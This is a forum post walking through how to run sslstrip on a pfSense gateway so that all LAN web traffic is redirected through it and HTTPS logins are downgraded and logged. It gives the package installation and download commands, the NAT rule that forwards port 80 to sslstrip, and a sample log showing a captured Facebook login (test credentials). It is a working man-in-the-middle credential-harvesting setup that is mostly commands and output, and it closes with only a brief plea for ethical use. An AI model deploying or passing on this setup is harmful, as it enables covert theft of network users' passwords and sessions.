Running SSLSTRIP on a pfSense box



  • Hi all, this is my first post here.

    I consider myself to be a total noob when it comes to pfSense or freebsd. However, I was looking into mitm type attacks for fun and wondered if it would be possible to run sslstrip on the gateway itself as to automatically process all traffic without the need for arp poisoning. I searched the web but couldn't find any info on how to do this, but I got it working on my own and thought I would share my experience here.

    I don't know exactly where to put this so I chose the general forum. Mods feel free to move it to a more appropriate location.

    First, we need to add a couple of packages to the box so SSLstrip can actually run:

    pkg_add -r ftp://ftp-archive.freebsd.org/pub/FreeBSD-Archive/ports/i386/packages-8.1-release/python/py26-twistedWeb-9.0.0.tbz
    

    This installs the Python Twisted Web python-module which is needed for sslstrip functionality. As a bonus, python itself gets installed automatically as a dependency.

    pkg_add -r ftp://ftp-archive.freebsd.org/pub/FreeBSD-Archive/ports/i386/packages-8.1-release/python/py26-openssl-0.10.tbz
    

    The openssl python-module is also needed for sslstrip, I couldn't start sslstrip without it.

    pkg_add -r ftp://ftp-archive.freebsd.org/pub/FreeBSD-Archive/ports/i386/packages-8.1-release/ftp/wget-1.12_1.tbz
    

    Installing wget ensures an easy method of getting the sslstrip tar file on your box.

    rehash
    

    Dont know what this is for, but I read online that you need to do this after installing packages.

    cd
    

    Let's run everything from the root home dir…

    wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz
    

    Download the sslstrip files

    tar zxvf sslstrip-0.9.tar.gz
    

    Extract the files to the ~/sslstrip-0.9 directory.

    cd sslstrip-0.9
    

    Change to the extracted directory

    python setup.py install
    

    Install the sslstrip files to the system

    So now you can try if it works:

    /usr/local/bin/sslstrip -h
    

    You should get something like this:

    [2.0.2-RC3][root@pfsense.localdomain]/root(2): /usr/local/bin/sslstrip -h
    
    sslstrip 0.9 by Moxie Marlinspike
    Usage: sslstrip <options>
    
    Options:
    -w <filename>, --write= <filename>Specify file to log to (optional).
    -p , --post                       Log only SSL POSTs. (default)
    -s , --ssl                        Log all SSL traffic to and from server.
    -a , --all                        Log all SSL and HTTP traffic to and from server.
    -l <port>, --listen=<port>        Port to listen on (default 10000).
    -f , --favicon                    Substitute a lock favicon on secure requests.
    -k , --killsessions               Kill sessions in progress.
    -h                                Print this help message.
    
    [2.0.2-RC3][root@pfsense.localdomain]/root(3):</port></port></filename></filename></options>
    

    Now, we need to create a nat rule to forward all tcp port 80 traffic to the port on which sslstrip listens. This is port 10000 by default.

    Go to firewall/NAT and create a new rule. Source address=LAN Net, proto=tcp, dest ports=80, nat ip=<ip address="" of="" your="" box="">, nat ports=10000. A firewall rule should be created automatically for you to put port 10000 open.

    Now in a ssh shell, run

    /usr/local/bin/sslstrip &
    

    This ensures sslstrip remains active even if you close the ssh session.

    Now a logfile is created in root's home dir called sslstrip.log which should contain passwords.

    Output of the file looks like so:

    [2.0.2-RC3][root@pfsense.localdomain]/root(9): cat sslstrip.log
    2012-07-03 21:49:49,290 POST Data (www.facebook.com):
    lsd=AVpQRVOK&return_session=0&legacy_return=1&display=&session_key_only=0&trynum=2&charset_test=%E2%82%AC%2C%C2%B4%2C%E2%82%AC%2C%C2%B4%2C%E6%B0%B4%2C%D0%94%2C%D0%84&timezone=-120&lgnrnd=124859_hr3C&lgnjs=n&email=testing&pass=testing123&default_persistent=0&login=Log+In
    [2.0.2-RC3][root@pfsense.localdomain]/root(10):
    

    You can see I entered testing as a username and testing123 as a password.

    That's all now. Please use this in an ethically responsible way.</ip>


Locked